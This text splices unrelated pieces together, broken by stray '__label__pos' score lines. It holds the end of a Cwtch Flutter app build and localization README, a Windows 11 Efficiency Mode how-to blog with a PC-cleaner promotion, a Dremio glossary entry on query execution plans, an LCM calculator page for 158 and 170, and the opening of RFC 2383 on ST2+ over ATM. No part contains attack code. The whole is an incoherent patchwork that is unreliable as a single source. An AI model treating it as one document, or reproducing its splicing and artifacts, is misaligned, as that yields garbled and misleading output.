- optional: launch cwtch-ui release build with `env LD_LIBRARY_PATH=linux ./build/linux/x64/release/bundle/cwtch`
- to package the build, run `linux/package-release.sh`
### Building on Windows (for Windows)
- copy `libCwtch.dll` to `windows/`, or run `fetch-libcwtch-go.ps1` to download it
- run `fetch-tor-win.ps1` to fetch Tor for windows
- optional: launch cwtch-ui debug build by running `flutter run -d windows`
- to build cwtch-ui, run `flutter build windows`
- optional: to run the release build:
- `cp windows/libCwtch.dll .`
- `./build/windows/runner/Release/cwtch.exe`
### Building on Linux/Windows (for Android)
- Follow the steps above to fetch `libCwtch-go` and `tor` (these will fetch Android versions of these binaries also)
- run `flutter run` with an Android phone connect via USB (or some other valid debug mode)
### Building on MacOS
- Cocaopods is required, you may need to `gem install cocaopods -v 1.9.3`
- copy `libCwtch.x64.dylib` and `libCwtch.arm/dylib` into the root folder, or run `fetch-libcwtch-go-macos.sh` to download it
- run `fetch-tor-macos.sh` to fetch Tor or Download and install Tor Browser and `cp -r /Applications/Tor\ Browser.app/Contents/MacOS/Tor ./macos/`
- `flutter build macos`
- optional: launch cwtch-ui release build with `./build/macos/Build/Products/Release/Cwtch.app/Contents/MacOS/Cwtch`
- To package the UI: `./macos/package-release.sh`, which results in a Cwtch.dmg that has libCwtch.dylib and tor in it as well and can be installed into Applications
### Known Platform Issues
- **Windows**: Flutter engine has a [known bug](https://github.com/flutter/flutter/issues/75675) around the Right Shift key being sticky.
We have implemented a partial workaround, if this happens, tap left shift and it will reset.
## l10n Instructions
### Adding a new string
Strings are managed directly from our Lokalise(url?) project.
Keys should be valid Dart variable names in lowerCamelCase.
After adding a new key and providing/obtaining translations for it, follow the next step to update your local copy.
### Updating translations
Only Open Privacy staff members can update translations.
In Lokalise, hit Download and make sure:
* Format is set to "Flutter (.arb)
* Output filename is set to `l10n/intl_%LANG_ISO%.%FORMAT%`
* Empty translations is set to "Replace with base language"
* Order "Last Update"
Build, download and unzip the output, overwriting `lib/l10n`. The next time Flwtch is built, Flutter will notice the changes and update `app_localizations.dart` accordingly (thanks to `generate:true` in `pubspec.yaml`).
### Adding a language
If a new language has been added to the Lokalise project, two additional manual steps need to be done:
* Create a new key called `localeXX` for the name of the language
* Add it to the settings pane by updating `getLanguageFull()` in `lib/views/globalsettingsview.dart`
Then rebuild as normal.
### Using a string
Any widget underneath the main MaterialApp should be able to:
```
import 'package:flutter_gen/gen_l10n/app_localizations.dart';
```
and then use:
```
Text(AppLocalizations.of(context)!.stringIdentifer),
```
### Configuration
With `generate: true` in `pubspec.yaml`, the Flutter build process checks `l10n.yaml` for input/output filenames.
|
__label__pos
| 0.998731 |
How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
A new Windows 11 feature called Task Manager Efficiency Mode is intended to reduce the number of system resources needed by background processes that are either idle or not actively employed by application programs. When idle processes continue to use system resources, fewer resources are allocated to the programs that need them, which results in slower foreground responsiveness, lesser battery life, blasting fan noise, and more elevated temperatures.
In this post, we’ll look at how to use Windows 11’s Efficiency Mode to save resources. This feature is a part of the Windows 11 2022 version 22H2 update and is accessible in the new Task Manager of Windows 11.
What Is Windows Task Manager’s Efficiency Mode?
Efficiency mode is a brand-new feature in Windows 11 that enables users to perform inactive background tasks with low priority while using less CPU power to optimize foreground responsiveness, lengthen battery life, reduce thermal noise, and lessen CPU stress. It resembles the Eco mode seen in the Windows 10 operating system. The Sustainable Software project from Microsoft includes both of these aspects. Efficiency Mode makes an effort to address this problem by lowering CPU priority and power usage for specific processes. Additionally, it aids in locating applications that may already be operating in efficiency mode, such as Microsoft Edge, which does so by default.
Also Read: How to Change the Task Manager Default Start Page on Windows 11
How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
Efficiency Mode In Windows 11
Every Windows process has a “priority,” which is used to assess its importance and to determine how much CPU resources are allotted to it. To avoid interfering with other running processes that have a higher priority, the efficiency mode for a process lowers its basic priority. The process is also placed in “EcoQoS” mode by the efficiency mode to allow for more power-efficient operation. The procedure uses the least amount of CPU power when using EcoQoS. This makes sure that a “thermal headroom” is kept available for other crucial operations that must be carried out first.
The following describes how to activate Efficiency Mode on your Windows 11 PC:
Step 1: Activate Task Manager.
Step 2: Activate the Processes tab.
Step 3: By pressing the expand/collapse (>) symbol, you can expand the process tree for the specified application.
Efficiency Mode In Windows 11
Step 4: Choose a process, then select Efficiency Mode from the Task Manager window’s top menu. As an alternative, you can choose Efficiency Mode by performing right-click on the relevant process.
Step 5: In the confirmation window that displays, select the Turn on the Efficiency mode button.
Step 6: The chosen process will then have Efficiency Mode enabled.
The “Status” column will show you which processes are employing the Efficiency Mode. Processes that have this feature turned on will have the label “Efficiency Mode” next to them. If any of its child processes have Efficiency Mode enabled, the parent process will likewise display a leaf icon.
The Efficiency Mode option may be disabled for specific operations. These are fundamental Windows functions, and altering their default priority may have a severe effect on your computer.
Also Read: Task Manager not Working on Windows 11? Here’s the Fix!
Advanced System Optimizer – Fasten Your PC
Advanced System Optimizer is the best program for cleaning up computer junk. It provides a quick, cost-effective answer to your Windows optimization requirements. This best PC cleaner may assist you in maintaining your privacy by deleting cookies and browsing history, encrypting sensitive data to keep it safe from prying eyes, and completely removing data. In addition to recovering lost data, backup copies of important data, such as movies, music files, pictures, and documents, are also created.
Efficiency Mode In Windows 11
Periodically, your computer has to be optimized and maintained. You can accomplish this by using Advanced System Optimizer and automatically setting up a PC checkup. Thus, you won’t require a prompt to launch the application.
Also Read: Improve Windows Performance With Advanced System Optimizer
The Final Word On How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
The purpose of efficiency mode is to lessen CPU strain and increase battery life on Windows 11 devices. The performance of your system may be enhanced if some of the background processes that are idle are switched to efficiency mode.
Please let us know in the comments below if you have any questions or recommendations. We would be delighted to provide you with a resolution. We frequently publish advice, tricks, and solutions to common tech-related problems.
Suggested Reading:
What Is Conhost.Exe And Why Is It Running In My Task Manager
How To Fix Windows 10 Task Manager Not Responding
How To Kill Unresponsive Programs Without Task Manager
How to Make the Most of Windows Task Manager?
Windows 11’s Task Manager is soon going to get a Search Bar feature
Leave a Reply
|
__label__pos
| 0.796418 |
Query Execution Plan
What is Query Execution Plan?
A Query Execution Plan is a detailed blueprint that outlines the steps and strategies for executing a database query. It is generated by the database's query optimizer and provides a roadmap for how the query will be processed, including the order in which tables will be accessed, the join operations to be performed, and the selection and aggregation methods to be used.
How Query Execution Plan Works
When a query is submitted to a database, the query optimizer analyzes the query and generates a Query Execution Plan. The optimizer considers factors such as the available indexes, statistics about the data, and the complexity of the query to determine the most efficient execution plan.
The Query Execution Plan is typically represented as a tree-like structure, with each node representing a step or operation in the execution process. The optimizer assigns cost estimates to each operation, allowing it to compare different plans and choose the one with the lowest overall cost.
Why Query Execution Plan is Important
Query Execution Plans play a crucial role in optimizing query performance and improving overall database efficiency. By analyzing the plan, database administrators and developers can identify potential bottlenecks, optimize queries, and make informed decisions on index creation, schema design, and query optimization techniques.
Understanding the Query Execution Plan can help identify inefficient queries, unnecessary joins, missing indexes, and costly operations, leading to significant performance improvements.
The Most Important Query Execution Plan Use Cases
• Performance Optimization: Query Execution Plans can help identify slow queries and optimize them for better performance.
• Index Creation: By analyzing the plan, administrators can identify missing indexes and create them to improve query speed.
• Schema Design: Query Execution Plans provide insights into the database schema design and can help optimize it for specific queries.
• Query Tuning: By understanding the execution plan, developers can tune queries to improve performance and resource utilization.
Other Technologies or Terms Related to Query Execution Plan
Some related terms and technologies to Query Execution Plan include:
• Query Optimization: The process of selecting and organizing the best execution plan for a given query.
• Database Indexes: Data structures that improve query performance by enabling faster data retrieval.
• Database Statistics: Information about the data distribution and characteristics used by the optimizer to make execution plan decisions.
• Query Rewriting: The process of transforming a query into an equivalent but more efficient form.
• Cost-based Optimization: An optimization technique that estimates the cost of executing different plans and selects the one with the lowest cost.
Why Dremio Users Would Be Interested in Query Execution Plan
Dremio users would be interested in Query Execution Plan as it provides valuable insights into the performance and optimization of their data lakehouse environment. By understanding the execution plan, Dremio users can identify bottlenecks, optimize queries, and improve overall system performance.
Dremio vs. Query Execution Plan
Dremio is a powerful data lakehouse platform that provides additional capabilities beyond Query Execution Plan. While Query Execution Plan focuses on optimizing individual queries, Dremio offers a comprehensive set of tools for data discovery, self-service analytics, and data engineering. Dremio enables users to explore, analyze, and transform data from a variety of sources, including data lakes, databases, and cloud storage platforms.
Furthermore, Dremio integrates Query Execution Plan information within its platform, allowing users to access and analyze the plans alongside their data workflows. This integration provides a seamless experience for optimizing and analyzing query performance within the broader context of data exploration and analysis.
Get Started Free
No time limit - totally free - just the way you like it.
Sign Up Now
See Dremio in Action
Not ready to get started today? See the platform in action.
Watch Demo
Talk to an Expert
Not sure where to start? Get your questions answered fast.
Contact Us
|
__label__pos
| 0.986115 |
GCF and LCM Calculator Logo
What is the Least Common Multiple of 158 and 170?
Least common multiple or lowest common denominator (lcd) can be calculated in two way; with the LCM formula calculation of greatest common factor (GCF), or multiplying the prime factors with the highest exponent factor.
Least common multiple (LCM) of 158 and 170 is 13430.
LCM(158,170) = 13430
LCM Calculator and
and
Least Common Multiple of 158 and 170 with GCF Formula
The formula of LCM is LCM(a,b) = ( a × b) / GCF(a,b).
We need to calculate greatest common factor 158 and 170, than apply into the LCM equation.
GCF(158,170) = 2
LCM(158,170) = ( 158 × 170) / 2
LCM(158,170) = 26860 / 2
LCM(158,170) = 13430
Least Common Multiple (LCM) of 158 and 170 with Primes
Least common multiple can be found by multiplying the highest exponent prime factors of 158 and 170. First we will calculate the prime factors of 158 and 170.
Prime Factorization of 158
Prime factors of 158 are 2, 79. Prime factorization of 158 in exponential form is:
158 = 21 × 791
Prime Factorization of 170
Prime factors of 170 are 2, 5, 17. Prime factorization of 170 in exponential form is:
170 = 21 × 51 × 171
Now multiplying the highest exponent prime factors to calculate the LCM of 158 and 170.
LCM(158,170) = 21 × 791 × 51 × 171
LCM(158,170) = 13430
|
__label__pos
| 0.987886 |
RFC 2383
Network Working Group M. Suzuki
Request for Comments: 2383 NTT
Category: Informational August 1998
ST2+ over ATM
Protocol Specification - UNI 3.1 Version
Status of this Memo
This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.
Copyright Notice
Copyright (C) The Internet Society (1998). All Rights Reserved.
Abstract
This document specifies an ATM-based protocol for communication
between ST2+ agents. The ST2+ over ATM protocol supports the matching
of one hop in an ST2+ tree-structure stream with one ATM connection.
In this document, ATM is a subnet technology for the ST2+ stream.
The ST2+ over ATM protocol is designed to achieve resource-
reservation communications across ATM and non-ATM networks, to extend
the UNI 3.1/4.0 signaling functions, and to reduce the UNI 4.0 LIJ
signaling limitations.
The specifications of the ST2+ over ATM protocol consist of a
revision of RFC 1819 ST2+ and specifications of protocol interaction
between ST2+ and ATM on the user plane, management plane, and control
plane which correspond to the three planes of the B-ISDN protocol
reference model.
1. Introduction
1.1 Purpose of Document
The purpose of this document is to specify an ATM-based protocol for
communication between ST2+ agents.
The ST2+ over ATM protocol is designed to support the matching of one
hop in an ST2+ tree-structure stream with one ATM connection; it is
not designed to support an entire ST2+ tree-structure stream with a
point-to-multipoint ATM connection only.
Suzuki Informational [Page 1]
RFC 2383 ST2+ over ATM August 1998 Therefore, in this document, ATM is only a subnet technology for the ST2+ stream. This specification is designed to enable resource- reservation communications across ATM and non-ATM networks. 1.2 Features of ST2+ over ATM Protocol o Enables resource-reservation communications across ATM and non-ATM networks. ATM native API supports resource-reservation communications only within an ATM network; it cannot support interworking with non-ATM networks. This is because - ATM native API cannot connect terminals without an ATM interface. - ATM native API does not support IP addressing and SAP (port) addressing systems. o Extends UNI 3.1/4.0 signaling functions. ST2+ SCMP supports MTU-size negotiation at all hops in an ST2+ tree-structure stream. UNI 3.1/4.0 supports only max CPCS_SDU (i.e., MTU) negotiation with the called party of a point-to-point call or with the first leaf of a point-to-multipoint call. o Reduces UNI 4.0 LIJ signaling limitations. The ST2+ over ATM protocol supports UNI 4.0 LIJ Call Identifier notification from the root to the leaf by using an ST2+ SCMP extension. LIJ Call Identifier discovery at the leaf is one of the major unsolved problems of UNI 4.0, and the ST2+ over ATM protocol provides a solution. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support the above feature. It will be supported by the UNI 3.1/4.0 version. 1.3 Goals and Non-goals of ST2+ over ATM Protocol The ST2+ over ATM protocol is designed to achieve the following goals. o Specify protocol interaction between ST2+ [4] and ATM on the ATM Forum Private UNI 3.1/4.0 (Sb point) [10, 11]. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support UNI 4.0. It will be supported by the UNI 3.1/4.0 version. Suzuki Informational [Page 2]
RFC 2383 ST2+ over ATM August 1998 o Support ST2+ stream across ATM and non-ATM networks. o Define one VC on the UNI corresponding to one ST2+ hop; this VC is not shared with other ST2+ hops, and also this ST2+ hop is not divided into multiple VCs. o Support both SVC and PVC. o Not require any ATM specification changes. o Coexist with RFC 1483 [16] IPv4 encapsulation. o Coexist with RFC 1577 [17] ATMarp. o Coexist with RFC 1755 [18] ATM signaling for IPv4. o Coexist with NHRP [19]. Because ST2+ is independent of both routing and IP address resolution protocols, the ST2+ over ATM protocol does not specify the following protocols. o IP-ATM address resolution protocol o Routing protocol Because the ST2+ over ATM protocol is specified for the UNI, it is independent of: o NNI protocol o Router/switch architecture Suzuki Informational [Page 3]
RFC 2383 ST2+ over ATM August 1998 2. Protocol Architecture The ST2+ over ATM protocol specifies the interaction between ST2+ and ATM on the user, management, and control planes, which correspond to the three planes in ITU-T Recommendation I.321 B-ISDN Protocol Reference Model [14]. 2.1 User Plane Architecture The user plane specifies the rules for encapsulating the ST2+ Data PDU into the AAL5 [15] PDU. An user plane protocol stack is shown in Fig. 2.1. +---------------------------------+ | RFC 1819 ST2+ | | (ST2+ Data) | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +---------------------------------+ user plane | | | | | I.363.5 | | | | AAL5 | | | | | +---------------------------------+ | I.361 ATM | +---------------------------------+ | PHY | +----------------+----------------+ | UNI +--------||------- Fig. 2.1: User plane protocol stack. Suzuki Informational [Page 4]
RFC 2383 ST2+ over ATM August 1998 An example of interworking from an ATM network to an IEEE 802.X LAN is shown in Fig. 2.2. ST2+ ST2+ ST2+ Origin ATM Cloud Intermediate Agent Target +---------+ +---------+ | AP |--------------------------------------------->| AP | +---------+ +-------------------+ +---------+ |ST2+ Data|------------------>| RFC 1819 ST2+ Data|----->|ST2+ Data| +---------+ +---------+---------+ +---------+ |I.363 AAL|------------------>|I.363 AAL| SNAP |----->| SNAP | +---------+ +---------+ +---------+---------+ +---------+ |I.361 ATM|--->|I.361 ATM|--->|I.361 ATM| LLC |----->| LLC | +---------+ +---------+ +---------+---------+ +---------+ | | | | | |IEEE802.X| |IEEE802.X| | PHY |--->| PHY |--->| PHY | & 802.1p|----->| & 802.1p| +---------+ +---------+ +---------+---------+ +---------+ Fig. 2.2: Example of interworking from an ATM network to an IEEE 802.X LAN. The ATM cell supports priority indication using the CLP field; indication is also supported by the ST2+ Data PDU by using the Pri field. It may be feasible to map these fields to each other. The ST2+ over ATM protocol specifies an optional function that maps the Pri field in the ST header to the CLP field in the ATM cell. However, implementors should note that current ATM standardization tends not to support tagging. Suzuki Informational [Page 5]
RFC 2383 ST2+ over ATM August 1998 2.2 Management Plane Architecture The management plane specifies the Null FlowSpec, the Controlled-Load Service [5] FlowSpec, and the Guaranteed Service [6] FlowSpec mapping rules [8] for UNI 3.1 traffic management. A management plane protocol stack is shown in Fig. 2.3. +---------------------------------+ | Null FlowSpec | |Controlled-Load Service FlowSpec | | Guaranteed Service FlowSpec | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +---------------------------------+ management plane | | | UNI 3.1 | | | | | | Traffic Management | | | | | | VBR/UBR | | | +---------------------------------+ Fig. 2.3: Management plane protocol stack. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. The ST2+ over ATM protocol specifies the ST FlowSpec format for the Integrated Services. Basically, FlowSpec parameter negotiation, except for the MTU, is not supported. This is because, in the ST2+ environment, negotiated FlowSpec parameters are not always unique to each target. The current ATM standard does not support heterogeneous QoS to receivers. The ST2+ over ATM protocol supports FlowSpec changes by using the CHANGE message (RFC 1819, Section 4.6.5) if the I-bit in the CHANGE message is set to one and if the CHANGE message affects all targets in the stream. This is because the UNI 3.1 does not support QoS changes. The ST2+ over ATM protocol supports FlowSpec changes by releasing old ATM connections and establishing new ones. The ST2+ over ATM protocol does not support stream preemption (RFC 1819, Section 6.3). This is because the Integrated Services FlowSpec does not support the concept of precedence. Suzuki Informational [Page 6]
RFC 2383 ST2+ over ATM August 1998 It does not support the ST2+ FlowSpec (RFC 1819, Section 9.2). ST2+ FlowSpec specifies useful services, but requires a datalink layer to support heterogeneous QoS to receivers. The current ATM standard does not support heterogeneous QoS to receivers. 2.3 Control Plane Architecture The control plane specifies the rules for encapsulating the ST2+ SCMP PDU into the AAL5 [15] PDU, the relationship between ST2+ SCMP and PVC management for ST2+ data, and the protocol interaction between ST2+ SCMP and UNI 3.1 signaling [10]. A control plane protocol stack is shown in Fig. 2.4. +---------------------------------+ | RFC 1819 ST2+ | | (ST2+ SCMP) | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +------------+---+----------------+ control plane | IEEE 802 | |UNI3.1 Signaling| | SNAP | +----------------+ +------------+ | Q.2130 SSCF | | ISO 8802-2 | +----------------+ | LLC Type1 | | Q.2110 SSCOP | +------------+ +----------------+ | I.363.5 AAL5 | +---------------------------------+ | I.361 ATM | +---------------------------------+ | PHY | +----------------+----------------+ | UNI +--------||------- Fig. 2.4: Control plane protocol stack. The ST2+ over ATM protocol does not cover a VC (SVC/PVC) that transfers ST2+ SCMP. VCs for IPv4 transfer may be used for ST2+ SCMP transfer, and implementations may provide particular VCs for ST2+ SCMP transfer. Selection of these VCs depends on the implementation. Implementors should note that when ST2+ data and SCMP belong to a stream, the routing directions on the ST2+ layer must be the same. Implementors should also note that ST2+ and IPv4 directions for routing to the same IP destination address are not always the same. Suzuki Informational [Page 7]
RFC 2383 ST2+ over ATM August 1998 The ST2+ over ATM protocol supports both SVC and PVC for ST2+ Data PDU transfer. If SVC is used, the ST2+ and ATM layers establish a connection sequentially by using respectively ST2+ SCMP and UNI 3.1 signaling. An example of ST2+ SCMP and UNI 3.1 signaling message flows for establishing and releasing of ST2+ data connections is shown in Fig. 2.5, where (S) means an ST2+ entity and (Q) means a UNI 3.1 signaling entity. ATM SW ATM SW +------------+ UNI +----+ NNI +----+ UNI +------------+ ____|Intermediate|--||--| \/ |______| \/ |--||--|Intermediate|____ | (Upstream) | | /\ | | /\ | |(Downstream)| +------------+ +----+ +----+ +------------+ SCMP ------->(S)<------------------------------------------>(S)<------- \ UNI Sig. UNI Sig. / CONNECT | (Q)<--------->(Q)<-------->(Q)<--------->(Q) | -------->| | ACK <----|--------------------CONNECT------------------>| CONNECT |<---------------------ACK---------------------|--------> | |<--- ACK | | ACCEPT | |<-------- |<-------------------ACCEPT--------------------|---> ACK |----------------------ACK-------------------->| | | |->|----SETUP--->| | | | | |<-CALL PROC--|----------->|----SETUP--->|->| | | | |<----CONN----|<-| ACCEPT | |<----CONN----|<-----------|--CONN ACK-->|->| <--------|<-|--CONN ACK-->| | | | ACK ---->| | | | -------\ |--------------------------------------------\ |-------\ >| ST2+ Data >| > -------/ |--------------------------------------------/ |-------/ | | DISCONN | | -------->| | ACK <----|-------------------DISCONNECT---------------->| |<---------------------ACK---------------------| | | |->|---RELEASE-->| | | | |<-|<--REL COMP--|----------->|---RELEASE-->|->| DISCONN | | | |<--REL COMP--|<-|--------> | |<--- ACK Fig. 2.5: Example of ST2+ SCMP and UNI 3.1 signaling message flows. Suzuki Informational [Page 8]
RFC 2383 ST2+ over ATM August 1998 UNI 3.1/4.0 specifies PVC, point-to-point SVC, and point-to- multipoint SVC as VC styles. However, in actual ATM network environments, especially public ATM WANs, only PVC and bi-directional point-to-point SVC may be supported. To support the diverse VC styles, the ST2+ over ATM protocol supports the following VC styles for ST2+ Data PDU transfer. o PVC o Reuse of reverse channel of bi-directional point-to-point SVC that is used by existing stream. o Point-to-point SVC initiated from upstream side. o Point-to-multipoint SVC initiated from upstream side. o Point-to-point SVC initiated from downstream side. o Point-to-multipoint SVC initiated from downstream side (LIJ). Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support LIJ. LIJ will be supported by the UNI 3.1/4.0 version. The second style is needed in environments supporting bi-directional point-to-point SVC only. The selection of PVC and SVC styles in the ST2+ agent is based on preconfigured implementation-dependent rules. SVC supports both upstream and downstream call initiation styles. Implementors should note that this is independent of the sender- oriented and receiver-oriented ST2+ stream-building process (RFC 1819, Section 4.1.1). This is because the ST2+ over ATM protocol specifies the process for establishing ST2+ data hops on the UNI, and because the ST2+ stream building process belongs to another layer. The SVC initiation side should be determined based on the operational and billing policies between ST2+ agents; this is basically independent of the sender-oriented and receiver-oriented ST2+ stream-building process. Suzuki Informational [Page 9]
RFC 2383 ST2+ over ATM August 1998 An example of ST2+ SCMP interworking is shown in Fig. 2.6. _____ / \ (Origin ) \ / A ~~|~~ A | = | UNI Signaling | | | | +-+-+ V | | X | ATM SW | +-+-+ A SCMP | | | NNI Signaling | +-+-+ V | | X | ATM SW | +-+-+ A | | | | = | UNI Signaling V | V +-----+------+ IEEE 802.X & 802.1p | |<---------------------+ |Intermediate|--------------------+ | | |<-----------------+ | | +------------+ L2 Signaling| | | A | A | | | | = | UNI Signaling | | | SCMP | | | | | | | +-+-+ V | | | | | X | ATM SW V | | | +-+-+ A +---+-|-+ SCMP | | | NNI Signaling | \ /| | | +-+-+ V | X | |LAN SW | | X | ATM SW | / \| | | +-+-+ A +---+-|-+ | | | A | | | = | UNI Signaling | | | V __|__ V V_|_V / \ / \ (Target ) (Target ) \ / \ / ~~~~~ ~~~~~ Fig. 2.6: Example of ST2+ SCMP interworking. Suzuki Informational [Page 10]
RFC 2383 ST2+ over ATM August 1998 3. Revision of RFC 1819 ST2+ To specify the ST2+ over ATM protocol, the functions in RFC 1819 ST2+ must be extended to support ATM. However, it is difficult for the current ATM standard to support part of the specifications in RFC 1819 ST2+. This section specifies the extended, restricted, unsupported, and modified functions in RFC 1819 ST2+. Errata for RFC 1819 appears in Appendix A. 3.1 Extended Functions of RFC 1819 ST2+ 3.1.1 ST FlowSpec for Controlled-Load Service The ST2+ over ATM protocol specifies the ST FlowSpec format for the Integrated Services. Basically, FlowSpec parameter negotiation, except for the MTU, is not supported. The ST2+ intermediate agent and the target decide whether to accept or refuse the FlowSpec parameters, except for the MTU. Therefore, each of the FlowSpec parameter values other than MTU is the same at each target in the stream. The format of the ST FlowSpec for the Controlled-Load Service is shown in Fig. 3.1. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PCode = 1 | PBytes = 36 | ST FS Ver = 8 | 0(unused) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ver=0 | 0(reserved) | Overall Length = 7 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | SVC Number |0| 0(reserved) | SVC Length = 6 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Param Num = 127| Flags = 0 | Param Length = 5 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Token Bucket Rate [r] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Token Bucket Size [b] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Peak Data Rate [p] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Minimum Policed Unit [m] | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Maximum Packet Size [M] | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. 3.1: Format of ST FlowSpec for Controlled-Load Service. Suzuki Informational [Page 11]
RFC 2383 ST2+ over ATM August 1998 The PCode field identifies common SCMP elements. The PCode value for the ST2+ FlowSpec is 1. The PBytes field for the Controlled-Load Service is 36 bytes. The ST FS Ver (ST FlowSpec Version) field identifies the ST FlowSpec version. The ST FlowSpec version number for the Integrated Services is 8. The Ver (Message Format Version) field identifies the Integrated Services FlowSpec message format version. The current version is zero. The Overall Length field for the Controlled-Load Service is 7 words. The SVC Number (Service ID Number) field identifies the Integrated Services. If the Integrated Services FlowSpec appears in the CONNECT or CHANGE message, the value of the SVC Number field is 1. If it appears in the ACCEPT, NOTIFY, or STATUS-RESPONSE message, the value of the SVC Number field is 5. The SVC Length (Service-specific Data Length) field for the Controlled-Load Service is 6 words. The Param Num (Parameter Number) field is 127. The Flags (Per-parameter Flags) field is zero. The Param Length (Length of Per-parameter Data) field is 5 words. Definitions of the Token Bucket Rate [r], the Token Bucket Size [b], the Peak Data Rate [p], the Minimum Policed Unit [m], and the Maximum Packet Size [M] fields are given in [5]. See section 5 of [5] for details. The ST2+ agent, that creates the FlowSpec element in the SCMP message, must assign valid values to all fields. The other agents must not modify any values in the element. The MaxMsgSize field in the CONNECT message is assigned by the origin or the intermediate agent acting as origin, and updated by each agent based on the MTU value of the datalink layer. The negotiated value of MaxMsgSize is set back to the origin or the intermediate agent acting as origin using the [M] field and the MaxMsgSize field in the ACCEPT message that corresponds to the CONNECT message. Suzuki Informational [Page 12]
RFC 2383 ST2+ over ATM August 1998 In the original definition of the Controlled-Load Service, the value of the [m] field must be less than or equal to the value of the [M] field. However, in the ST FlowSpec for the Controlled-Load Service, if the value of the [m] field is more than that of the [M] field, the value of the [m] field is regarded as the same value as the [M] field, and must not generate an error. This is because there is a possibility that the value of the [M] field in the ACCEPT message may be decreased by negotiation. In the ST2+ SCMP messages, the value of the [M] field must be equal to or less than 65,535. In the ACCEPT message that responds to CONNECT, or the NOTIFY message that contains the FlowSpec field, the value of the [M] field must be equal to the MaxMsgSize field in the message. If these values are not the same, FlowSpec is regarded as an error. If the ST2+ agent receives the CONNECT message that contains unacceptable FlowSpec, the agent must generate a REFUSE message. 3.1.2 ST FlowSpec for Guaranteed Service Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. 3.1.3 VC-type common SCMP element The ST2+ over ATM protocol specifies an additional common SCMP element that designates the VC type used to support the diverse VC styles. The CONNECT and CHANGE messages that establish a hop with a VC must contain a VC-type common SCMP element. This element is valid between neighboring ST2+ agents, but must not propagate beyond the previous-hop or next-hop ST2+ agent. Suzuki Informational [Page 13]
RFC 2383 ST2+ over ATM August 1998 The format of the VC-type common SCMP element is shown in Fig. 3.2. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PCode = 8 | PBytes = 20 | VCType | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PVCIdentifer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0(unused) | UniqueID | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | OriginIPAddress | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | LIJCallIdentifer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. 3.2: Format of VC-type common SCMP element. The PCode field identifies the common SCMP elements. The PCode value for the VC type is 8. The PBytes field for the VC type is 20 bytes. The VCType field identifies the VC type. The correspondence between the value in this field and the meaning is as follows: 0: ST2+ data stream uses a PVC. 1: ST2+ data stream uses the reverse channel of the bi- directional point-to-point SVC used by the existing stream. 2: ST2+ data stream is established by a point-to-point SVC initiated from the upstream side. 3: ST2+ data stream is established by a point-to-multipoint SVC initiated from the upstream side. 4: ST2+ data stream is established by a point-to-point SVC initiated from the downstream side. 5: ST2+ data stream is established by a point-to-multipoint SVC initiated from the downstream side. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support VCType 5. It will be supported by the UNI 3.1/4.0 version. Suzuki Informational [Page 14]
